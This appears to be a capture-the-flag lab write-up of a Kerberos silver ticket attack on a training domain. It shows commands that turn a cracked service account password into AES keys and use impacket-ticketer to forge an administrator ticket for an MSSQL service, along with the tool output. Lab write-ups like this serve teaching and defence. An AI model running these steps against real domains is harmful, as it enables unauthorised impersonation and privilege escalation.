Silver Ticket Attack (Forging TGS)
the silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (or AES hash of Kerberos key). Thus, it is possible to gain access to that service by forging a custom TGS as any user. It also must be taken into account that it is possible AND PREFERABLE (OPSEC) to forge tickets using the AES Kerberos keys (AES128 and AES256)
The current assessment is that the compromised sqlsvc account from Kerberoasting is a valid service account that is responsible for the MSSQL instance. Although, access to the instance with the service account is denied, the service account can further be leveraged for TGS forgery to grant any user access to the MSSQL instance.
while tgs forging (silver ticket attack) is done with Mimikatz or Rubeus on a Windows environment., it can also be done remotely with impacket-ticketer from a remote Linux environment
Prep
The following entries are required;
<TARGET>-spn-domain-domain-sid- Signing with
-nthashor-aesKey
Once complete, the target service (SPN) can be accessed with the forged TGS(Ticket Granting Service) Ticket
<TARGET>
Since access to SQL database is limited to the “network administrators”, it would have to be an admin account.
That makes the administrator user a perfect candidate.
SPN
The MSSQL instance is the target service
Therefore, it will be set to MSSQLSvc/dc1.scrm.local:1433 as it is the SPN of the MSSQL instance
Domain
SCRM.LOCAL is the target domain
Domain SID
While there are many ways to enumerate the Domain SID at this point, it has already been enumerated during the BloodHound session
The SID of SCRM.LOCAL is S-1-5-21-2743207045-1827831105-2542523200
Signing
While NT hash can also be used to sign the forged TGS ticket, it won’t work with the current environment as the NTLM authentication is disabled in the target domain. So I will have to go with the Kerberos key option
aesKrbKeyGen
A Python script that I found online will be used here to encrypt the CLEARTEXT password of the sqlsvc user with the FQDN of the domain as the salt to AES128/256 key
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ python3 aesKrbKeyGen.py -domain SCRM.LOCAL -user sqlsvc -p Pegasus60
[*] Salt: SCRM.LOCALsqlsvc
[+] AES256 Key: F19A7078CFC8EC0D0CF9340DCAE67A9F33ED6223D10FAC1D273B274A97C510F5
[+] AES128 Key: 33217B54C9017B85F881BEE06B858BEAI will grab one of those. Either one is fine
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ impacket-ticketer administrator -spn MSSQLSvc/dc1.scrm.local -domain SCRM.LOCAL -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -aesKey F19A7078CFC8EC0D0CF9340DCAE67A9F33ED6223D10FAC1D273B274A97C510F5
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SCRM.LOCAL/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccachePutting all the required entries together, I can forge a TGS ticket offline to impersonate the administrator user with the SPN set to MSSQLSvc/dc1.scrm.local. This can be used to access the target MSSQL instance.
As it is signed with the credential of the service account (sqssvc) responsible for running the MSSQL instance, the target MSSQL instance on the port 1433 will consequently recognize and accept this forged TGS ticket.